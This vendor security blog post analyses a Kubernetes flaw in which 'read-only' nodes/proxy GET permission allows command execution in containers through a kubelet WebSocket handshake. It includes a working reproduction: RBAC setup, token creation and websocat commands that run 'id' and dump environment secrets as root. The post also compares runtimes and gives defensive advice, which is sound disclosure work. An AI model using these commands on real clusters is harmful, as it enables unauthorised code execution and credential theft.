Your Monitoring Stack Just Became an RCE Vector: A Deep-Dive into the Kubernetes nodes/proxy RCE

Last week, security researcher Graham Helton published a report showing that a service account with nothing more than the nodes/proxy GET permission can achieve full remote code execution (RCE) in any container on a Kubernetes node. This permission is routinely granted to monitoring tools like Prometheus, Datadog, and Grafana for metrics collection. Depending on the security configuration, this could lead to a full cluster takeover.

We investigated whether workloads running under Edera's isolation were vulnerable. The short answer: they're not. But the longer answer is more interesting. It reveals why architectural decisions matter, why defense in depth isn't just a marketing buzzword, and why the Kubernetes community needs to think harder about secure defaults.

First, a Thank You to the Security Research Community

Before we dive in, we want to acknowledge Graham Helton's work. Security researchers who responsibly disclose vulnerabilities like this are heroes. They make the entire ecosystem safer, often without recognition or compensation. The Kubernetes community, and especially those of us running AI workloads, financial services, and healthcare applications, owes researchers like Graham a debt of gratitude.

If you haven't read Graham's original post, we encourage you to do so. It's thorough, serves as a great introduction to some Kubernetes internals, and provides important context for what follows.

How a Kubernetes GET Request Turns Into Full Remote Code Execution

To understand this vulnerability, we need to cover some background on how Kubernetes handles container execution and how WebSocket connections work.

How Kubernetes Exec Works

When you run kubectl exec -it my-pod -- /bin/bash, there’s a lot that happens under the hood:

  1. Your kubectl client sends a request to the Kubernetes API server
  2. The API server checks your RBAC permissions for pods/exec CREATE
  3. If authorized, the API server proxies your request to the kubelet’s API endpoint on the node
  4. The kubelet connects to the container runtime (containerd, CRI-O, edera, etc.) to start the exec session
  5. A bidirectional stream is established for stdin/stdout/stderr

The key word here is CREATE. Executing commands in a container is considered a write operation, so it requires the create verb on the pods/exec RBAC resource.
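
For reference, an RBAC rule that legitimately grants exec access looks something like this (a minimal sketch; the role name is illustrative):

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: debug-exec-role        # illustrative name
rules:
- apiGroups: [""]
  resources: ["pods/exec"]
  verbs: ["create"]            # exec is a write operation, hence the create verb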

The WebSocket Protocol Primer

WebSocket is a protocol that enables bidirectional communication over a single TCP connection. It's used extensively in Kubernetes for familiar operations like exec, attach, and port-forward.

Crucially, WebSockets begin with an HTTP GET request. This is called the "upgrade handshake" and is defined in RFC 6455. The client sends a GET request with special headers, and the server responds with HTTP 101 (Switching Protocols) to upgrade the connection.

GET /exec/default/my-pod/container?command=id HTTP/1.1
Host: 10.0.0.5:10250
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==
Sec-WebSocket-Protocol: v4.channel.k8s.io
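
If the handshake succeeds, the server answers with something like the following (the Sec-WebSocket-Accept value is derived from the client's key as defined in RFC 6455):

HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: s3pPLMBiTxaQ9kYGzzhZRbK+xOo=
Sec-WebSocket-Protocol: v4.channel.k8s.io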

The RBAC and WebSocket Mismatch That Enables RCE

Here's where things get spicy:

  1. The kubelet maps HTTP methods to RBAC verbs: GET → get, POST → create
  2. The /exec endpoint normally expects POST requests
  3. But WebSocket connections use GET for the handshake
  4. The kubelet sees a GET request, checks for get permission, and allows it
  5. The connection upgrades, and suddenly you have an all-powerful exec session

Result: If you have nodes/proxy GET permission, you can bypass the pods/exec CREATE RBAC requirement entirely. This matters because of how organizations treat these two permissions:

  • pods/exec CREATE is considered highly sensitive and security teams rightly audit it carefully. It's typically restricted to cluster administrators, on-call engineers, or specific debugging roles. Granting it broadly is a red flag in any security review.
  • nodes/proxy GET is considered read-only. It's routinely granted to monitoring tools, often across the entire cluster. Even mature security teams rarely take notice because it looks like nothing more than GET requests for metrics.

Read differently: your Prometheus service account, which you thought could only scrape metrics, can execute arbitrary commands as root in any container on any node it can reach.

A permission typically granted for observability becomes a permission for remote code execution.
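
If you want to know how exposed you are today, a quick audit along these lines can help (a sketch assuming jq is installed; it only checks ClusterRoles, not namespaced Roles):

# List every ClusterRole that mentions nodes/proxy in its rules
kubectl get clusterroles -o json \
  | jq -r '.items[] | select([.rules[]?.resources[]?] | index("nodes/proxy")) | .metadata.name'

# Then check which subjects are bound to those roles
kubectl get clusterrolebindings -o wide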

Why nodes/proxy Exists and How It Can Be Abused

The nodes/proxy resource allows direct communication with the kubelet API. It's generally used for:

  • Metrics collection: Prometheus scraping /metrics and /stats
  • Health monitoring: Tools checking node health status
  • Log aggregation: Accessing container logs directly
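
For example, a monitoring agent's read-only scrape of kubelet metrics through the API server proxy path looks like this (the node name is a placeholder):

# Legitimate use: fetch kubelet metrics via the API server's node proxy
kubectl get --raw "/api/v1/nodes/<node-name>/proxy/metrics" | head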

Many organizations grant this permission broadly to their observability stack. A typical ClusterRole looks like this:

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: monitoring-role
rules:
- apiGroups: [""]
  resources: ["nodes/proxy"]
  verbs: ["get"]

It's just GET. Read-only. What could go wrong? As this vulnerability shows: everything. And the Kubernetes maintainers have signaled that this is working as intended and won't be patched.

Why Kubernetes Considers nodes/proxy RCE “Working as Intended”

When this vulnerability was reported to the Kubernetes Security Team, they determined it is "working as intended" and will not receive a CVE. Their position is that nodes/proxy has always been a privileged resource, and the proper fix is KEP-2862 (Fine-Grained Kubelet API Authorization), expected to reach GA in Kubernetes 1.36 (April 2026).

Step-by-Step: Reproducing the nodes/proxy RCE

We built a test harness to validate this vulnerability in our environment. Here's how to reproduce it in yours.

Step 1: Create a Service Account with Minimal Permissions

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: vuln-test-role
rules:
- apiGroups: [""]
  resources: ["nodes/proxy"]
  verbs: ["get"]
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: vuln-test-sa
  namespace: default
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: vuln-test-binding
subjects:
- kind: ServiceAccount
  name: vuln-test-sa
  namespace: default
roleRef:
  kind: ClusterRole
  name: vuln-test-role
  apiGroup: rbac.authorization.k8s.io

Step 2: Verify Permissions

# Generate a token for the service account
TOKEN=$(kubectl create token vuln-test-sa -n default --duration=1h)


# List permissions - look for "nodes/proxy" with "get" verb
kubectl auth can-i --list --token="$TOKEN" | grep nodes/proxy
# Expected output: nodes/proxy    []    []    [get]


# Verify we do not have pods/exec permission
kubectl auth can-i create pods/exec --token="$TOKEN"
# Expected output: no

Note: On EKS and other managed Kubernetes platforms, kubectl auth can-i get nodes/proxy may incorrectly return "no" due to webhook authorizer limitations. Use kubectl auth can-i --list instead, which correctly shows the granted permissions.

Step 3: Deploying a Target Pod for Exploitation

apiVersion: v1
kind: Pod
metadata:
  name: victim
  namespace: default
spec:
  containers:
  - name: victim
    image: python:slim
    command: ["sleep", "infinity"]
    env:
    - name: SECRET_API_KEY
      value: "super-secret-key-12345"
    - name: DATABASE_PASSWORD
      value: "production-db-password"

Step 4: Exploiting nodes/proxy for Remote Code Execution

From an attacker pod (or any machine with network access to the kubelet):

# Get a token for the service account
TOKEN=$(kubectl create token vuln-test-sa --duration=1h)

# Get the node's internal IP
NODE_IP=$(kubectl get node <node-name> -o jsonpath='{.status.addresses[?(@.type=="InternalIP")].address}')

# The exploit - using websocat to establish a WebSocket exec session
websocat -k \
  -H "Authorization: Bearer $TOKEN" \
  --protocol v4.channel.k8s.io \
   "wss://${NODE_IP}:10250/exec/default/victim/victim?output=1&error=1&command=id"

Result on standard containers:

uid=0(root) gid=0(root) groups=0(root)
{"metadata":{},"status":"Success"}

You now have RCE as root inside the container. From here, an attacker can:

  • Extract environment variables (secrets, API keys, database credentials), as sketched below
  • Read mounted volumes (potentially including service account tokens)
  • Make network requests to internal services
  • Install persistence mechanisms
  • Attempt container escape via kernel vulnerabilities
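
For instance, dumping the environment (and with it the secrets from Step 3) is just a matter of changing the command parameter in the same WebSocket call:

# Same exploit, different command: dump the container's environment variables
websocat -k \
  -H "Authorization: Bearer $TOKEN" \
  --protocol v4.channel.k8s.io \
  "wss://${NODE_IP}:10250/exec/default/victim/victim?output=1&error=1&command=env"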

Testing the nodes/proxy RCE Against Edera

It’s never a good feeling when your favorite distributed system turns out to have a remote code execution vector this severe.

At Edera, we build on top of, and harden, Kubernetes. So how did this vulnerability play out? Did our microVM container execution environment limit remote code execution to a single isolation domain?

To test, we deployed identical victim pods: one running on the standard containerd runtime and one running on Edera’s edera runtime.

Exploit Result on a Standard Kubernetes Container Runtime

$ websocat -k --protocol v4.channel.k8s.io \
    "wss://${NODE_IP}:10250/exec/default/victim-standard/victim?output=1&command=id"

uid=0(root) gid=0(root) groups=0(root)
{"metadata":{},"status":"Success"}

Vulnerable. The attacker achieves RCE.

Exploit Result on an Edera-Isolated Container

$ websocat -k --protocol v4.channel.k8s.io \
    "wss://${NODE_IP}:10250/exec/default/victim-edera/victim?output=1&command=id"

HTTP/1.1 405 Method Not Allowed
Allow: POST

The request is rejected before reaching the container. Not vulnerable 😮‍💨

Why Edera Is Protected

Let's be transparent: this protection is a beneficial side-effect of Edera's architecture, not a feature we specifically designed to counter this vulnerability.

Edera implements the Container Runtime Interface (CRI) differently than traditional runtimes. When the kubelet forwards an exec request to the Edera runtime, our streaming endpoint (written in Rust, with no Go components) only accepts POST requests. The WebSocket upgrade handshake, which arrives as a GET request, is rejected with HTTP 405 Method Not Allowed.

From the attacker's perspective, the request never gets far enough to establish a session. The runtime itself refuses to process it.

Comparing Exec Behavior Between Standard Runtimes and Edera

We can see this difference by testing the HTTP methods directly:

Request                               Standard containerd          Edera Runtime
POST /exec (normal kubectl exec)      Works                        Works
GET /exec (WebSocket upgrade)         Upgrades to exec session     405 Method Not Allowed
curl -X OPTIONS /exec                 Returns allowed methods      Returns allowed methods

Both runtimes support legitimate kubectl exec operations (which use POST through the API server). But only Edera blocks the direct WebSocket GET exploit.
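
You can confirm the legitimate path yourself: an ordinary exec through the API server succeeds against both pods (pod names as in the tests above):

# Both succeed: kubectl exec is authorized as pods/exec CREATE and routed through the API server
kubectl exec victim-standard -- id
kubectl exec victim-edera -- id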

But What If Edera Were Vulnerable?

This is where defense in depth becomes important. Let's imagine that Edera's exec endpoint did accept the WebSocket upgrade.

The attacker would land inside a microVM with its own dedicated kernel.

Comparing Blast Radius: Shared Kernel vs Isolated MicroVM

Standard container compromise: the attacker has RCE in a container sharing the host kernel.

  • Can see all processes on the node via /proc (if not properly namespaced)
  • Can potentially exploit kernel vulnerabilities to escape to the host
  • Can access shared resources (cgroups, network namespaces) for lateral movement
  • One compromised container can lead to a compromise of the entire node

Edera container compromise: the attacker has RCE inside an isolated microVM.

  • Cannot see processes from other pods or the host, as there's no shared /proc
  • Kernel exploits affect only that microVM's kernel, not the host
  • No shared kernel memory, cgroups, or namespaces to abuse
  • The blast radius is contained to a single workload

Why nodes/proxy RCE Is Especially Dangerous for AI Workloads

Organizations running AI inference services face a particular risk. These workloads often:

  • Hold model weights worth millions in R&D investment
  • Have access to GPU resources (high-value targets)
  • Connect to data pipelines containing sensitive training data
  • Run with elevated permissions for performance reasons

A single container compromise in a standard Kubernetes cluster could lead to model exfiltration, data theft, or corruption of inference results. With Edera's isolation, even a successful exec exploit cannot reach beyond the boundaries of the compromised microVM.

When Kubernetes Won’t Patch: Understanding the Real Risk

Earlier, we mentioned that the Kubernetes Security Team determined this behavior is "working as intended." Here's the full context of their response:

Following further review with SIG-Auth and SIG-Node, we are confirming our decision that this behavior is working as intended and will not be receiving a CVE. While we agree that nodes/proxy presents a risk, a patch to restrict this specific path would require changing authorization in both the kubelet (to special-case the /exec path) and the kube-apiserver (to add a secondary path inspection for /exec after mapping the overall path to nodes/proxy) to force a double authorization of “get” and “create.” We have determined that implementing and coordinating such double-authorization logic is brittle, architecturally incorrect, and potentially incomplete.

We remain confident that KEP-2862 (Fine-Grained Kubelet API Authorization) is the proper architectural resolution. Rather than changing the coarse-grained nodes/proxy authorization, our goal is to render it obsolete for monitoring agents by graduating fine-grained permissions to GA in release 1.36, expected in April 2026.

The Kubernetes Security Team

Why Kubernetes Rejects a Patch for nodes/proxy

The Kubernetes Security Team's reasoning is thoughtful:

  1. Architectural integrity: A targeted patch would require coordinated changes across multiple components with special-case logic. This is the kind of complexity that could lead to future vulnerabilities.
  2. Proper fix exists: KEP-2862 introduces fine-grained permissions (nodes/metrics, nodes/stats, nodes/log) that give monitoring tools least-privilege access without the exec capability (sketched after this list).
  3. Deprecation path: Once KEP-2862 reaches GA and sees adoption, nodes/proxy can be deprecated for monitoring use cases.
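
Once those fine-grained sub-resources are available, a monitoring role could drop nodes/proxy entirely. Here's a sketch of what that might look like, based on the sub-resources named above (the role name is illustrative, and exact resources and behavior depend on how KEP-2862 graduates):

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: monitoring-role-fine-grained   # illustrative name
rules:
- apiGroups: [""]
  resources: ["nodes/metrics", "nodes/stats", "nodes/log"]
  verbs: ["get"]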

Why the Risk Has Changed Since nodes/proxy Was Designed

We understand the difficult tradeoffs the Kubernetes security team has to navigate for features with a large blast radius and complexity. KEP-2862 is genuinely the right long-term solution.

But we believe the risk calculus has changed.

KEP-2862 is expected to GA in April 2026. After that, it requires adoption across the entire ecosystem. Monitoring tools need to update their RBAC requirements, Helm charts need revision, and cluster operators need to migrate. Realistically, most production clusters won't have this protection until 2027 or later.

Kubernetes doesn’t just run stateless web apps. It's running AI training pipelines with proprietary model weights, financial trading systems, and healthcare applications with patient data. The blast radius of a monitoring stack compromise in 2026 is categorically different from 2016.

This vulnerability illustrates a difficult truth: you cannot rely solely on upstream security to protect your workloads. This is why architectural isolation matters. It's not about mitigating vulnerabilities; it's about building systems that remain resilient to compromise even when vulnerabilities exist, and even when patches aren't coming.

How Operators, Maintainers, and Vendors Should Respond

For cluster operators: 

  1. Audit your RBAC policies for nodes/proxy permissions immediately
  2. Consider whether monitoring tools truly need direct kubelet access
  3. Implement network policies restricting access to kubelet port 10250 (a sketch follows this list)
  4. Plan your migration to KEP-2862 fine-grained permissions when they GA
  5. Adopt workload isolation technologies that limit blast radius regardless of upstream decisions
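
For the network-policy recommendation, the general shape is an egress policy that only allows in-cluster and DNS traffic, so pods cannot reach the kubelet on a node IP directly. A minimal sketch (the policy name is illustrative, enforcement of node-IP traffic varies by CNI, and hostNetwork pods are not covered):

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: deny-direct-kubelet-egress     # illustrative name
  namespace: default
spec:
  podSelector: {}                      # applies to every pod in this namespace
  policyTypes:
  - Egress
  egress:
  - to:
    - namespaceSelector: {}            # allow pod-to-pod traffic inside the cluster
  - ports:                             # allow DNS lookups to any destination
    - protocol: UDP
      port: 53
    - protocol: TCP
      port: 53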

For the Kubernetes project:

  1. Prioritize KEP-2862 adoption and provide clear migration guides
  2. Consider whether new clusters should default to fine-grained authorization
  3. Document the security implications of nodes/proxy more prominently

For the industry:

  1. Recognize that "detect and respond" alone is insufficient for container security
  2. Recognize that upstream maintainers, even excellent ones, cannot protect you from every threat
  3. Invest in isolation technologies that make successful exploits containable
  4. Assume vulnerabilities will exist, and architect systems to contain them
  5. Treat defense in depth as a requirement, not an option

nodes/proxy RCE Proves Why Architectural Isolation Matters

The nodes/proxy GET vulnerability is a reminder that distributed systems security is hard. Even benign permissions become attack vectors when combined with protocol idiosyncrasies. And sometimes, even when you report these issues, upstream maintainers make reasonable decisions that still leave your workloads exposed.

Edera happens to block this particular exploit due to architectural decisions in our CRI implementation. But the deeper lesson isn't "use Edera"; it's that defense in depth works. When you isolate workloads at the kernel level, even novel vulnerabilities become containable events rather than cluster-wide compromises.

The Kubernetes community has an opportunity to build systems that are resilient and secure by default. KEP-2862 is a step in the right direction. But until secure defaults are the norm, and even after they are, architectural isolation remains your last line of defense.

We hope this analysis contributes to that conversation and encourages the ecosystem to think beyond "patch or don't patch" and toward "how do we contain the blast radius when things go wrong?"

Thanks again to Graham Helton for the original vulnerability research.

Have questions or want to discuss isolation strategies? Reach out to us at security@edera.dev.

FAQ

What is the Kubernetes nodes/proxy RCE vulnerability?

The nodes/proxy RCE vulnerability allows attackers with GET access to nodes/proxy to establish WebSocket exec sessions and execute arbitrary commands inside containers.

Why is nodes/proxy considered dangerous?

Although often treated as read-only, nodes/proxy grants direct access to the kubelet API, which can be abused to bypass RBAC protections.

Are monitoring tools like Prometheus affected?

Yes. Monitoring tools are frequently granted nodes/proxy GET permissions, making them potential attack vectors if compromised.

Why won’t Kubernetes patch this vulnerability?

The Kubernetes Security Team considers this behavior “working as intended” and plans to address it through fine-grained kubelet authorization (KEP-2862).

How does isolation change the impact of this RCE?

With isolated runtimes, even successful exec exploits are contained within a single workload and cannot compromise the node or other pods.
